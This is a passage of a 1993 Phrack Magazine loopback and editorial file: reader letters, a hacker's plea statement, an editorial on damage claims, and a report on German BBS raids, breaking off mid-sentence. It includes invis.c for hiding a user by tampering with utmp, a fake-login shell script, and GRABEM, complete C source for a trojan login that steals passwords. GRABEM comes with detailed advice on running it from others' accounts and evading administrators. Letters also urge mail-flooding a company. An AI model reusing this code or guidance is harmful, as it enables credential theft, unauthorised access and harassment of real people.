home *** CD-ROM | disk | FTP | other *** search
/ The Hacker's Encyclopedia 1998 / hackers_encyclopedia.iso / zines / phrack2 / phrack42.002 < prev    next >
Encoding:
Text File  |  2003-06-11  |  46.5 KB  |  1,115 lines

  1.                           ==Phrack Magazine==
  2.  
  3.               Volume Four, Issue Forty-Two, File 2 of 14
  4.  
  5.                       [-=:< Phrack Loopback >:=-]
  6. ============================================================================
  7.       !!!!WATCH THIS SPACE FOR SUMMERCON INFORMATION NEXT ISSUE!!!!
  8. ============================================================================
  9.  
  10. I 'found' this little C program a few days ago, and runs on most UNIX
  11. machines I think (As I found it, I cant claim fame for writing it!).
  12.  
  13. What it does, is change your userid and x25 address to anything of your
  14. choice. This only affects programs such as 'write' and 'who'. It doesn't
  15. automatically give you different access rights, so it can only be used
  16. to disguise your real identity.
  17.  
  18. Usage
  19. -----
  20.  
  21.    inv god somewhere (Changes your uid to 'god' and X.25 to 'somewhere')
  22.    inv ''  ''        (Makes you INVISIBLE on 'who')
  23.  
  24. Program invis.c
  25. ---------------
  26.  
  27. #include <stdio.h>
  28. #include <utmp.h>
  29. #include <sys/types.h>
  30.  
  31. #include <lastlog.h>
  32.  
  33. main(argc,argv)
  34. int argc;
  35. char *argv[];
  36. {
  37.  FILE *f;
  38.  struct utmp u;
  39.  
  40.  int v=ttyslot(1);
  41.  if(v==-1)
  42.  {
  43.   fprintf(stderr,"Can't find terminal.\n");
  44.   exit(1);
  45.  
  46.  if(argc!=3)
  47.  {
  48.   fprintf(stderr,"Args!\n");
  49.   exit(1);
  50.  }
  51.  f=fopen("/etc/utmp","r+");
  52.  if(f==NULL)
  53.  {
  54.   fprintf(stderr,"Utmp has escaped!\n");
  55.   exit(1);
  56.  }
  57.  if(fseek(f,v*sizeof(u),0)==-1)
  58.  {
  59.   fprintf(stderr,"Garbage utmp\n");
  60.   exit(1);
  61.  }
  62.  if(fread((char *)&u,sizeof(u),1,f)!=1)
  63.  {
  64.   fprintf(stderr,"Write failed\n");
  65.   exit(1);
  66.  }
  67.  
  68.  strncpy(u.ut_name,argv[1],8);
  69.  strncpy(u.ut_host,argv[2],16);
  70.  if(fseek(f,v*sizeof(u),0)==-1)
  71.  {
  72.   fprintf(stderr,"Seek failed\n");
  73.   exit(1);
  74.  }
  75.  fwrite((char *)&u,sizeof(u),1,f);
  76.  fclose(f);
  77. }
  78.  
  79. I personaly have not used this program (to hack or for anything else)
  80. What you do with it is up to you....,
  81.                                                             ________
  82. Have fun...., !!!                                          (        )____
  83.                                                           (  Alas, life  )
  84.                                                         (   is but an   )
  85.                                                         (    Aardvaark.. )
  86.                                                          (       __      )
  87.                                                       .   (_____)  (____)
  88. * * * * * * * * * * * * * * * *                     . ? .       ()
  89. * CHEERS_ THEN - _     _      *                       __      ()
  90. *   ___/_/______|_|___| |__   *                     /    \  ()
  91. *  |________   _______| |__|  *                    |_    _|
  92. *    / /    | | | |   | |     *                   |(0)||(0)|
  93. *   / /___  | | | |   | |     *                  /|_  \/  _|\
  94. *  /___  /  | | | |   | |     *                  || | == | ||
  95. *     / /   | | \  \__/ /     *                  || \____/ ||
  96. *    / /    |_|   \____/      *                 ///\  !!  /\\\
  97. *-*-/_/-*-*-*-*-*-*-*-*-*-*-*-*-=-=-=-=-=-=-=-=-!!!-!-=-=-!-!!!-=-=-=-=-=-=-=-=
  98.  
  99. -------------------------------------------------------------------------------
  100.  
  101. I am interested in getting in contact with hackers in Nord Italy
  102. (I am located in Torino). Do you know anybody ?
  103.  
  104. Can you help TheNewHacker ??
  105.  
  106. Thanks
  107.  
  108. TheNewHacker
  109.  
  110. [Editor:  Actually, we are in the process of recruiting people to
  111.           write for a compilation file on the hacking scenes in countries
  112.           around the world.  One person is working on Italy.  Perhaps when
  113.           this file is completed, you will be able to network through that
  114.           information.
  115.           If anyone in a country other than America is interested in
  116.           contributing to this effort, please write us at:
  117.           phrack@well.sf.ca.us !  ]
  118.  
  119. -----------------------------------------------------------------------------
  120.  
  121.  
  122. hello, i must say i love your publication.  I have a little kind of
  123. hack/phreak for you guys.
  124.  
  125. When you approach a Red light, preferably at night with few cars around,
  126. continually flash your bright lights.  This tricks the light into believing
  127. this a cop waiting behind traffic at the light thus changing the light after
  128. about 10 flashes.  I discovered that after seeing several police officers turn
  129. on their lights before they hit lights and was amazed on how easily the light
  130. changed.  If you have say, a Mag-lite the trick works if you point directly
  131. at the top of the post-light and the ones hanging right above red on verticals
  132. and right above yellow on horizontals.
  133.  
  134. hope this helps etc.   (i fucking hate those damn red lights)
  135.  
  136. Dave.
  137.  
  138. [Editor:  I've actually tried this.  It works on most major
  139.           intersections]
  140.  
  141. -----------------------------------------------------------------------------
  142.  
  143. Hallo !
  144. I'd like to make just some addition to the APPENDIX A of the
  145. Racketeer's article "The POWER of Electronic Mail" - there are
  146. new guys in InterNET -> Russians (!). They have the awful
  147. connection, but it's cool team. So, add :
  148.  
  149.  .su           kremvax.hq.demos.su
  150.  
  151. And one more note, in the SMTP installed on the Sun Station I'm working
  152. on there isn't command TICK, but exist some strange like RSET and
  153. EXPN.
  154.       Spy
  155.  
  156.   P.S. Sorry for my bad English.
  157.  
  158. [Editor:  Russia has a lot of computers online these days.  Look for
  159.           more on the Russian Internet in upcoming Phracks!]
  160.  
  161. -----------------------------------------------------------------------------
  162.  
  163. There is another, much simpler way to expand your password collection,
  164. other than tty spoofing. Why not just run a program that simulates the
  165. login process, and then leave it running on the console for an unsuspecting
  166. victim? A simple example is below. Execute by typing getpass:logout.
  167.  
  168. --------File: getpass----------
  169. LOGIN=""
  170. PASSWD=""
  171. clear
  172. echo -n "login: "
  173. read LOGIN
  174. echo "$LOGIN" >name
  175. sleep 3
  176. echo -n "Password:"
  177. read PASSWD
  178. echo "$PASSWD" >password
  179. echo
  180. echo -n "Login incorrect"
  181. -------------------------------
  182.  
  183. The only problem I have is that I don't know how to make it so that
  184. the password, when entered, isn't shown on the screen. I'm sure you
  185. can come up with a solution.
  186.  
  187.  
  188. [Editor:  actually, someone kinda did.  See the next letter]
  189.  
  190. -----------------------------------------------------------------------------
  191.  
  192. A Better UNIX Password Grabber
  193. by The K-Man
  194.  
  195.  
  196. I blame it entirely on boredom.  Well, that and an acute case of end-
  197. of-semester neural gridlock.  I was sitting in the lab a couple of years
  198. ago, my head leaning against a Sparc-2 display, my index finger hitting the
  199. return key over and over again at the login prompt.  It was all my mind and
  200. body were capable of at the time.  Then a little thought formed in the back
  201. of my mind: "You know, it would be pretty damn easy to write a program to
  202. imitate the behavior of this screen while grabbing user id's and passwords."
  203. So I logged in and started coding.  Then I thought to myself, "You know, with
  204. a few extra lines of code and a couple of tricks, I could make this little
  205. guy almost completely undetectable and untraceable while running."  So I
  206. coded some more.  A couple of hours later, out popped the following
  207. program:
  208.  
  209. ---------------------------- Cut Here -----------------------------------
  210.  
  211. /*----------------------------------------------------------------------+
  212. | GRABEM 1.0            by The K-Man      |
  213. | A Cute little program to collect passwords on the Sun workstations.   |
  214. +----------------------------------------------------------------------*/
  215.  
  216. #define PASSWORD "Password:"
  217. #define INCORRECT "\nLogin incorrect"
  218. #define FILENAME ".exrc%"
  219.  
  220. #include <stdio.h>
  221. #include <signal.h>
  222.  
  223.  
  224. /*-----------------------------------------------------------------------+
  225. | ignoreSig                 |
  226. |                   |
  227. | Does nothing. Used to trap SIGINT, SIGTSTP, SIGQUIT.     |
  228. +-----------------------------------------------------------------------*/
  229. void ignoreSig ()
  230. {
  231.  return;
  232. }
  233.  
  234.  
  235. /*-----------------------------------------------------------------------+
  236. | Main                    |
  237. +-----------------------------------------------------------------------*/
  238. main()
  239. {
  240.  
  241. char  name[10],     /* users name             */
  242.   password[10];    /* users password         */
  243.  
  244.  
  245.  
  246. int  i,       /* loop counter               */
  247.   lab,      /* lab # you're running on    */
  248.   procid;      /* pid of the shell we're under  */
  249.  
  250. FILE  *fp;      /* output file          */
  251.  
  252.  
  253.  /*-------------------------------------------------------------------+
  254.  | Trap the SIGINT (ctrl-C), SIGSTP (ctrl-Z), and SIGQUIT (ctrl-\)    |
  255.  | signals so the program doesn't stop and dump back to the shell.    |
  256.  +-------------------------------------------------------------------*/
  257.  signal (SIGINT, ignoreSig);
  258.  signal (SIGTSTP, ignoreSig);
  259.  signal (SIGQUIT, ignoreSig);
  260.  
  261.  /*-------------------------------------------------------------------+
  262.  | Get the parent pid so that we can kill it quickly later.  Remove   |
  263.  | this program from the account.          |
  264.  +-------------------------------------------------------------------*/
  265.  procid = getppid();
  266.  system ("\\rm proj2");
  267.  
  268.  /*-------------------------------------------------------------------+
  269.  | Ask for the lab # we're running on.  Clear the screen.    |
  270.  +-------------------------------------------------------------------*/
  271.  printf ("lab#: ");
  272.  scanf ("%d", &lab);
  273.  for (i=1; i<40; i++)
  274.   printf ("\n");
  275.  getchar();
  276.  
  277.  /*-------------------------------------------------------------------+
  278.  | Outer for loop.  If the name is <= 4 characters, it's probably not |
  279.  | a real id.  They screwed up.  Give 'em another chance.             |
  280.  +-------------------------------------------------------------------*/
  281.  for(;;)
  282.  {
  283.   /*---------------------------------------------------------------+
  284.   | If they hit return, loop back and give 'em the login again.    |
  285.   +---------------------------------------------------------------*/
  286.   for (;;)
  287.   {
  288.    printf("lab%1d login: ",lab);
  289.    gets (name);
  290.  
  291.    if (strcmp (name, "") != 0)
  292.     break;
  293.   }
  294.  
  295.   /*---------------------------------------------------------------+
  296.   | Turn off the screen echo, ask for their password, and turn the |
  297.   | echo back on.              |
  298.   +---------------------------------------------------------------*/
  299.   system ("stty -echo > /dev/console");
  300.   printf(PASSWORD);
  301.   scanf("%s",password);
  302.   getchar();
  303.   system ("stty echo > /dev/console");
  304.  
  305.  
  306.   /*---------------------------------------------------------------+
  307.   | Write their userid and password to the file.                   |
  308.   +---------------------------------------------------------------*/
  309.   if ( ( fp = fopen(FILENAME,"a") )  != NULL )
  310.   {
  311.    fprintf(fp,"login %s has password %s\n",name,password);
  312.    fclose(fp);
  313.   }
  314.  
  315.   /*---------------------------------------------------------------+
  316.   | If the name is bogus, send 'em back through         |
  317.   +---------------------------------------------------------------*/
  318.   if (strlen (name) >= 4)
  319.    break;
  320.   else
  321.    printf (INCORRECT);
  322.  }
  323.  
  324.  /*-------------------------------------------------------------------+
  325.  | Everything went cool. Tell 'em they fucked up and mis-typed and    |
  326.  | dump them out to the REAL login prompt.  We do this by killing the |
  327.  | parent process (console).                                          |
  328.  +-------------------------------------------------------------------*/
  329.  printf (INCORRECT);
  330.  kill (procid, 9);
  331. }
  332.  
  333. ---------------------------- Cut Here -----------------------------------
  334.  
  335.  
  336. HOW IT WORKS
  337.  
  338. You can probably figure this out by reading the code, but I thought I'd
  339. just add some comments on why I did what I did.
  340.  
  341. The first thing is does is install the signal handler. All it does is trap
  342. SIGINT, SIGSTP, and SIGQUIT, so that the person trying to log into the machine
  343. this baby is running on can't kill it with a keystroke.  Next, it gets the
  344. parent process ID.  We'll use this later to kill it off quickly.  Then it
  345. proceeds to erase the executable file.  Sysadmins can't find a trojan horse
  346. program that isn't there.
  347.  
  348. >From here it goes on to imitate the login and password prompts.  You'll
  349. probably have to change the code to get it to imitate the login process on
  350. your particular machine.
  351.  
  352. When it gets a userid and password, it appends them to an existing file in
  353. the account.  I chose the .exrc, but any dot file will work.  The point being
  354. to use a file that already exists and should be in the account.  Don't leave
  355. any extra suspicious files lying around.
  356.  
  357. After it writes the uid and password to the file, it bumps the user back
  358. to the real login prompt by killing off the shell that was the parent process
  359. of the program.  The cut is almost instantaneous; the user would have to be
  360. inhumanly observant to notice the transition.
  361.  
  362.  
  363. HOW TO USE
  364.  
  365. Well, first you need an account to run it from.  If your site has guest accounts,
  366. you've got it made.  If not, I'd suggest using a little social engineering to
  367. get one other person's account.  With that account and the program, you can grab
  368. access to many more.  I wouldn't recommend running it from an account that has
  369. your name on it.  That just makes it a little more dangerous than it needs to be.
  370. Of course, if the sysadmin happens to catch the program running on your login,
  371. you can always claim to know nothing.  Say someone else must have gotten your
  372. password and is using your account to escape detection.  He might buy it.  But
  373. if you have the source for the program sitting somewhere in your account, and
  374. they find it, you're fucked.  So it's best to use someone else's account for
  375. the job.
  376.  
  377. After you've gotten the account you'll be running it from, you'll need to get
  378. the program in that account somehow.  I started off by keeping a copy of the
  379. source somewhere it my account, named with something innocuous and hidden
  380. among bunches of source files, but I got paranoid and started hauling the source
  381. around with me on a bar floppy.  Do whatever suits your level of paranoia.
  382.  
  383. Copy the source to the account you'll be running it from and compile it.
  384. Trash the source, and name the program something that won't stand out in a
  385. ps list.  selection_svc is a nice innocuous name, and it appears everywhere.
  386. Do a ps on one of your machines and look for processes that hang around for
  387. a long time.  You might want to hide it as a daemon.  Be creative.
  388.  
  389. Now run the program and sit back and wait.  Or leave and come back later.
  390. When you know that someone has tried to log on to your booby trapped machine,
  391. log back into the account you borrowed to run the program in and vi or emacs (if
  392. you're that kind of person) out the captured userid and password.  Simple as
  393. that.
  394.  
  395. Note that the two times that you stand the greatest chance of being caught
  396. are when you first compile and run the program and when you retrieve your
  397. captured uid and passwords.  There's the remote chance that someone might see
  398. you at work and see what you're doing, but it's not very likely.  If you start
  399. acting all paranoid you'll draw more attention to yourself than you would have
  400. gotten in the first place.  If your site has dialup lines, you might want to do
  401. a dialin to retrieve the passwords. Or you might prefer to do it in person.
  402. All depends on your paranoia quotient which you think is more secure, I guess.
  403.  
  404.  
  405. TIPS
  406.  
  407. Be careful which dot files you use.  I chose the .exrc because it was something
  408. that wasn't used often at our site.  If you chose the .cshrc or other frequently
  409. accessed file, put a # before the uid and password you write to that file.  That
  410. way,  when that dot file is sourced, it'll treat that line as a comment and not
  411. spit out an error message that could cause suspicion.
  412.  
  413. Try to run the program at a time when you know there will be heavy machine
  414. usage.  That way you'll trap something quick.  The longer your program
  415. runs, the greater the chance it will be found.
  416.  
  417. Don't be greedy.  Run on only one or two machines at a time.  And if you run
  418. on more than one machine, run out of a different account on each one.  Again,
  419. the more you put out there, the better the chance that at least one will be
  420. found.
  421.  
  422.  
  423. PARTING NOTE
  424.  
  425. The morning after I wrote this program was the first time I got to use it.  I
  426. set it running on a guest account, the went to a machine across the room to
  427. do some legitimate work.  One of my friends walks in shortly after that, and
  428. we start shooting the shit.  A minute or two later, the sysadmin walks in, sits
  429. down, and logs in to the machine I ran the program on.  I came really close to
  430. dropping my fudge right then and there.  The only thing running through my
  431. mind was "Either I'm totally fucked, or I have root."  Turned out it was choice
  432. B.  Too bad the guy changed his password once a week, and I wasn't smart enough
  433. to fix it so that I would see the change.  Oh well, I had fun for a week though.
  434. There were quite a few interesting e-mail messages sent back and forth that week.
  435. I think the best one was the one from our (male) department head to one of our
  436. radical she-male hard-core no-damn-gifs feminist female professors, detailing
  437. all the perverted sexual acts that he would like to perform with and on her. :)
  438.  
  439. Anyway, have fun with the program.  Maybe I'll get a chance to come up with
  440. some more cool UNIX programs in the future.
  441.  
  442.  
  443.            Later,
  444.             K-Man
  445.  
  446. -----------------------------------------------------------------------------
  447.  
  448.         In a recent issue of PHRACK you had some article or loopback about
  449. getting information about people via modem.  I am somewhat interested in
  450. this and could use this information.  I have a friend who is a part-time
  451. bounty hunter and could use such information to track people down.
  452. Could you please send me some information about who to contact to find out
  453. this information.  What I could REALLY use is an on-line up-to-date
  454. phone/address book that I could call to find out anybody's address.  Is
  455. there such a thing?  If you have any information please e-mail me, since I
  456. am unable to get your mag on a regular basis.  Thanx a mil!
  457.  
  458.                                 Scarface
  459.  
  460. [Editor:  Actually there are quite a large number of databases that keep
  461.           information on everyone.  There is TRW, Equifax, TransUnion,
  462.           Information America and NAI just to name a few.  Many of these
  463.           services are very expensive, but even services like CompuServe
  464.           allow users to look up people all over America using
  465.           PhoneFile which compiles data from all kinds of public
  466.           records.  Nexis can allow you to look up real estate data on
  467.           just about anyone with loans on their houses.  Every public
  468.           utility and department of motor vehicles provides information
  469.           on their records, and many are online.
  470.  
  471.           A good book to read about this kind of thing is
  472.  
  473.           Privacy For Sale
  474.           Jeffrey Rothfeder
  475.  
  476.           Simon & Schuster
  477.           $22.00]
  478. -----------------------------------------------------------------------------
  479.                             THE GOLDEN ERA REBORN!
  480.  
  481.      Relive the thrill of the golden era of hacking through our exclusive
  482.         collection of BBS messages.  Our collection contains posts from
  483.           over 40 of the most popular hack/phreak BBSes of all time.
  484.        Experience the birth of the computer underground again from your
  485.        own computer with this collection of original posts from bulletin
  486.                                  boards like:
  487.  
  488.                                    * 8BBS *
  489.                                    * OSUNY *
  490.                                  * PLOVERNET *
  491.                             * THE LEGION OF DOOM *
  492.                              * BLACK ICE PRIVATE *
  493.                             * THE PHOENIX PROJECT *
  494.  
  495.                                And many more...
  496.  
  497.                Messages are available in many computer formats:
  498.                                       IBM
  499.                                      Amiga
  500.                                    Macintosh
  501.  
  502.             For more information, please contact LOD Communications
  503.  
  504.                       email:  lodcom@mindvox.phantom.com
  505.  
  506.                          US Mail:  LOD Communications
  507.                                 603 W. 13th St.
  508.                                  Suite 1A-278
  509.                                Austin, TX 78701
  510.  
  511.                            Voice Mail:  512-448-5098
  512. -----------------------------------------------------------------------------
  513.  
  514. You might like this one...
  515. --bob
  516. ****************************************
  517. I just saw a transcript of a press conference given by
  518. Secret Service Agent Frericks, in Lubbock last December.
  519.  
  520. here is a brief extraction...
  521.  
  522. FRERICKS: Um hm. This is a major nation wide, world wide problem from
  523. an industry point of view with tremendous losses in funds tremendous
  524. losses of money. the VAX account at the University is a way to get
  525. into numerous other research accounts or Internet which is the ...you
  526. get onto Internet you can talk to anybody else who is on Internet
  527. anywhere in the world which these kids were talking to Belgium, and
  528. Israel and Australia and they can do that just by this, thus avoiding
  529. long distance phone calls.  But most of the people on Internet I mean
  530. on the VAX are there legitimately for research purposes they can go to
  531. Mayo and get a file if they're a med student and they also get one of
  532. these pamphlets if they get, like the Department of Engineering gives
  533. out an account number just for that semester, the professor would give
  534. it out so you can use the VAX well they also get one of those
  535. pamphlets that explains what the rules are and the instructor spends a
  536. good bit of time the first couple of classes going over computer
  537. etiquette, computer rules.
  538.  
  539. [Editor:  Another of America's finest.]
  540.  
  541. -----------------------------------------------------------------------------
  542.  
  543.  
  544.     I typed this because of the mention of Software Security International in
  545. the article "More than $100,000 in Illegal Software Seized" in Rambone's
  546. Pirates Cove in Phrack 41.
  547.     He mentioned that they were the investigators that finally brought down
  548. APL. I am not only familiar with that, a past friend of mine was
  549. there when the Marshalls took the board. He was there as representative of
  550. SSI.
  551.  The best part that Rambone didn't know, was that they couldn't get into
  552. APL to verify the existence of the software, until they got the password
  553. breaker from Novell. So in essence, they looked like some dumb fools.
  554. They didn't have any idea on how to approach the network.
  555.  
  556.  Software Security International Can be reached at...
  557.   1-800-724-4197
  558.  
  559.   2020 Pennsylvania Avenue N.W.
  560.   Suite 722
  561.   Washington, D.C. 20006-1846
  562.  
  563. That is of course if they finally have gotten off the ground. Last I Heard (2-3
  564. months ago) they were still having trouble getting Financial Backing. They did
  565. the APL Bust for nothing, just to prove they could do it. They are also on a
  566. lot of other BBS's around America. So as a warning to other sysops, Cover your
  567. Ass.
  568.  
  569.  You could rack up some serious negative cash flow by sending tons of
  570. mail to the box above, then it gets Airborne'd to Washington State.
  571.  
  572. see ya
  573.  
  574. [Editor:  I think it might be a good idea to send them a few postcards
  575.           every day for the next few weeks.  Just to stay in touch.]
  576. -----------------------------------------------------------------------------
  577.  
  578.                          ==Phrack Magazine==
  579.  
  580.               Volume Four, Issue Forty-Two, File 2b of 14
  581.  
  582.                         [-=:< Editorial >:=-]
  583.  
  584. Before I jump upwards onto my soapbox and spew forth a meaty
  585. editorial I would like to relay something to the readers of Phrack.
  586. The following is a transcript of John Lee's  (Corrupt's) confession
  587. to the charges facing him.  (From Security Insider Report, Jan. 1993)
  588.  
  589. What follows is in my opinion a very poor attempt at a plea-bargain,
  590. and obviously induced by attorney coercion.  I must wonder what John
  591. was thinking when he agreed to this admission.
  592. ======================================================================
  593.  
  594. I agreed with others to violate various laws related to the use of
  595. computers.  I agreed to do the following:
  596.  
  597. 1)  I agreed to possess in excess of fifteen passwords which
  598.     permitted me to gain access to various computer systems
  599.     including all systems mentioned in the indictment and others.
  600.     I did not have authorization to access these systems.  I knew
  601.     at the time that what I did was wrong.
  602.  
  603. 2)  I used these access devices and in doing so obtained the value of time
  604.     I spent within these systems as well as the value of the passwords
  605.     themselves which I acknowledge was more than $1000.
  606.  
  607. 3)  I intentionally gained access to what I acknowledge are Federal interest
  608.     computers and I acknowledge that work had to be done to improve the
  609.     security of these systems which was necessitated by my unauthorized
  610.     access.
  611.  
  612. 4)  I was able to monitor data exchange between computer systems and by
  613.     doing so intentionally obtained more passwords, identifications and
  614.     other data transmitted over Tymnet and other networks.
  615.  
  616. 5)  I acknowledge that I and others planned to share passwords and
  617.     transmitted information across state boundaries by modem or telephone
  618.     lines and by doing so obtained the monetary value of the use of the
  619.     systems I would otherwise have had to pay for.
  620.  
  621. Among the ways I and others agreed to carry out these acts are the following:
  622.  
  623.   1.  I was part of a group called MOD.
  624.  
  625.   2.  The members of the group exchanged information including passwords
  626.       so that we could gain access to computer systems which we were not
  627.       authorized to access.
  628.  
  629.   3.  I got passwords by monitoring Tymnet, calling phone company
  630.       employees and pretending to be computer technicians, and using
  631.       computer programs to steal passwords.
  632.  
  633. I participated in installing programs in computer systems that would give
  634. the highest level of access to members of MOD who possessed the secret
  635. password.
  636.  
  637. I participated in altering telephone computer systems to obtain
  638. free calling services such as conference calling and free billing
  639. among others.
  640.  
  641. Finally, I obtained credit reports, telephone numbers and addresses
  642. as well as other information about individual people by gaining access
  643. to information and credit reporting services.  I acknowledge that on
  644. November 5, 1991, I obtained passwords by monitoring Tymnet.
  645.  
  646. I apologize for my actions and am very sorry for the trouble I have
  647. caused to all concerned.
  648.  
  649. John Lee
  650.  
  651.  
  652. ==========================================================================
  653.  
  654.  
  655. This issue I would like to call attention to what I consider to be
  656. a very pressing issue.  There has always been a trend to pad the
  657. amount of dollar damages incurred to any victim of a hacker attack.
  658. I personally feel that the blame is never directed at the true guilty
  659. parties.
  660.  
  661. Certainly, if someone is caught breaking into a system, then they are
  662. surely guilty of some form of electronic trespass.  I will also
  663. concede that such a person may or may not be guilty of other crimes
  664. based upon their actions once inside that system.  What I have the
  665. most problems dealing with is the trend to blame the hacker for any
  666. expenditures needed to further secure the system.
  667.  
  668. With this mindset, why should any corporation bother to add any
  669. security at all?  Why not just wait until someone happens across
  670. a few poorly secured sites, nab them, and claim damages for the
  671. much needed improvements in security?
  672.  
  673. The worst culprits in this type of behavior has been the RBOCs.  As was
  674. seen with the supposed damages incurred for the distribution of the
  675. "911 document" and most recently with the $370,000 damages supposedly
  676. incurred by Southwestern Bell resulting from the alleged activities
  677. of those in MOD.
  678.  
  679. Perhaps this figure does have some basis in reality, or perhaps it is
  680. just an arbitrary figure dreamed up by a few accountants to be used
  681. at year end to explain some losses in the corporate stock report.
  682. Most often figures such as this factor in such ridiculous items as
  683. the actual system hardware penetrated.  I can hardly see the relevance
  684. of such a charge.
  685.  
  686. Even if these charges are to be believed, why isn't the blame being
  687. evenly distributed?  Why aren't stockholders crying for the heads of
  688. system administrators, MIS managers and CIOs?  These are the people who
  689. have not adequately done their jobs, are they not?  If they had expended
  690. a bit of time, and a small amount of capital, the tools exist to make
  691. their systems impervious to attack.  Period.
  692.  
  693. If I had an investment in a company such as Southwestern Bell, I would be
  694. outraged that the people I was employing to perform data security
  695. functions were not apt enough to keep a group of uneducated gangsters
  696. out of their switching systems.  Why haven't there been any emergency
  697. meetings of shareholders?  Why isn't anyone demanding any changes in policy?
  698. Why is everyone still employed?
  699.  
  700. Not to blame Southwestern Bell too harshly, they were sorely outclassed
  701. by MOD, and had absolutely no way to cope with them.  Not only because MOD
  702. were competent telco hackers, but because Southwestern Bell's network
  703. service provider had given them free reign.
  704.  
  705. Southwestern Bell's packet switched network, Microlink II, was designed
  706. and implemented for SWBT by Tymnet (then owned by McDonnell Douglas).
  707. An interesting thing I've heard about SWBNET, and about every other subnet
  708. arranged by Tymnet, is that the information concerning gateways, utilities,
  709. locations of node code, etc., is purported to be located in various
  710. places throughout Tymnet internal systems.  One such system, was described
  711. to me as a TYMSHARE system that contained data files outlaying every subnet
  712. on Tymnet, the mnemonics (username/password pair) to each utility, gateway,
  713. and the ONTYME II mail access keys.
  714.  
  715. If this information is correct, then shouldn't Tymnet be called in to
  716. acknowledge their role in the attacks on Southwestern Bell?
  717.  
  718. Let's say a Realtor sold you a house, but told you that he would be keeping
  719. copies of all your keys so that he could help you with the maintenance.
  720. Some time later, you notice that a few of your books have been read, but
  721. nothing else is disturbed.  Later on you notice that your tv is on and your
  722. bed is all messed up.  A week later your stereo is gone.  You set up a trap
  723. and catch someone going into your house with your own key!  You find that
  724. the burglars had made copies of all the keys held by your Realtor.  You
  725. then find that the Realtor neglected to put the keys in a safe, and in fact
  726. had left them lying around on the table in his back yard labeled with
  727. the addresses they corresponded to.
  728.  
  729. Who would you be more upset with?  The individual who copied and used the
  730. keys, or the Realtor for not providing the access to your valuables more
  731. vigilantly?  I would personally be far more upset with the Realtor, for
  732. if he had put the keys in a safe this event would have probably never
  733. transpired.
  734.  
  735. I'm not saying that people who get caught for breaking into computer
  736. systems should be let go, especially if they can be proven to be involved
  737. in the sale of hacked information for a personal profit.  What I am saying
  738. that if hackers are to be punished so vigorously for what I view as a
  739. predominantly victimless crime, then everyone should have to line
  740. up and take their fair share of the blame.
  741.  
  742. I think it's high time that the real blame be placed on the corporate
  743. entities who seemingly refuse to acknowledge their role in these
  744. break-ins.  Neglect of duties and lack of responsibility on the part
  745. of the employees, the interconnect carriers, the data network providers,
  746. the hardware vendors, etc. all play a key role in the problems that
  747. exist in the world's data networks today.  In fact, if it were not for
  748. computer hackers, these problems would continue to lie dormant until either
  749. discovered by accident in the field, or the provider decided to go ahead
  750. and illuminate its clients to the existence of such a problem.
  751.  
  752. I wholeheartedly encourage each and every reader of Phrack to
  753. purchase one share of stock in any corporation you know that has exhibited
  754. such tendencies and take your place on the floor of the next shareholders
  755. meeting and scare the hell out of the board of directors.
  756. Phrack Magazine is calling a discount brokerage very soon.
  757.  
  758. -------------------------------------------------------------------------------
  759.  
  760.                          ==Phrack Magazine==
  761.  
  762.               Volume Four, Issue Forty-Two, File 2c of 14
  763.  
  764.  
  765.                            //   //  /\   //   ====
  766.                           //   //  //\\ //   ====
  767.                          ==== //  //  \\/   ====
  768.  
  769.                      /\   //  // \\    //  /===   ====
  770.                     //\\ //  //   //  //   \=\   ====
  771.                    //  \\/    \\ //  //   ===/  ====
  772.  
  773. ******************************************************************************
  774.  
  775.                           BBS Busts in Germany
  776.                           ====================
  777.  
  778.  
  779. Thursday, March 18, 1993.
  780.  
  781. This day will be remembered as a black day in German BBS history.
  782. In fact, it was the blackest day in German BBS history since the raid
  783. of 18 Berlin BBS in Berlin and North Germany a couple of months ago.
  784.  
  785. What has happened?  A couple of Bulletin Board Systems (BBS) have
  786. been raided by the police.  All these BBS had "warez" online, illegal,
  787. pirated, copyrighted Software - usually for PC/MSDOS and Amiga.
  788. This time, most of these BBS were in Bavaria, South Germany.
  789.  
  790. Now let's take a closer look at the events:
  791.  
  792. One guy who got busted was MST, Sysop of Southern Comfort BBS
  793. in Munich.  In fact, his board went offline 9 days before.
  794. But he was so unlucky still having his computer and his warez.
  795. He was even using his modem to trade warez at the very moment
  796. the cops rang his doorbell.  Why did he go offline just so short
  797. before he got busted?  His board had been running for over 1 year.
  798.  
  799. Here is the text file MST released about going offline:
  800.  
  801. THURSDAY 03-09-93 00:15
  802. THE SOUTHERN COMFORT BBS IS CLOSED !
  803. I AM NOT BUSTED OR ANYTHING LIKE THIS !
  804. I CLOSED THE BBS COS OF PERSONAL REASONS AND
  805. PERHAPS IT WILL BE OPENED AGAIN IN 1 OR 2 MONTH !
  806. I HOPE YOU WOULD UNDERSTAND THIS DECISION BUT SCENE
  807. IS NOT ALL WHAT LIFE CAN BE ALL USER ACCOUNTS STAY
  808. ALIVE AND WILL BE HERE AT A NEW??? OPENING !
  809.  
  810. SO I SAY BYE TO THE SCENE FOR PERHAPS ONLY A SHORT TIME !
  811.  
  812. MST/RAZOR 1911
  813.  
  814. A couple of days later, MST was posting ads in local BBS to sell his
  815. old equipment.  But obviously he wasn't fast enough.  Maybe this was
  816. one of the reasons the cops busted him on March, 18.  They were afraid
  817. he might get rid of his illegal software, so they hurried up to catch him!
  818.  
  819. He got busted at 10am this morning.  Three cops were knocking on his door,
  820. until he opened.  They had a search warrant and confiscated all his
  821. computer equipment, disks, modems...
  822.  
  823. Chris used to have a board until four months ago, and now trades for TDT and
  824. other groups.  He was in school this morning.  His parents weren't home
  825. either.  So the cops broke into his house, smashed the wooden door, and
  826. seized all his equipment.  He is asked to speak to the Police this Tuesday.
  827.  
  828. Chris used to be one of the most active traders for PC warez in Germany.
  829. He and his friend Michelangelo supported boards like Schizophrenia and
  830. Beverly Hills, which they co-sysop'ed.  They were also known as the
  831. 'Beverly Hills Boys', a new German cracking group.
  832.  
  833. After Chris' bust, a couple of boards were affected:
  834. Beverly Hills went offline.  Also the German Headquarters of the Beverly
  835. Hills Boys, 'Twilight Zone', went offline.  Their sysops estimate at least
  836. 1-3 months offline time.
  837.  
  838. The other Munich BBS and their sysops were really scared after the bust
  839. and took down their systems for an uncertain amount of time.
  840.  
  841. One of Germany's largest BBS, Darkstar in Augsburg, was a heaven for
  842. every warez collector.  It had 8 modems hooked up (all US Robotics Dual
  843. Standard 16.8) and one ISDN Line.
  844.  
  845. It had over 2 GB PC warez online, and over 7 GB offline on tapes, which
  846. would be put online according to user' requests.
  847.  
  848. But then, March 18 arrived, and the dream was shattered.
  849. Its sysop, Rider, who was happily calling boards the previous day,
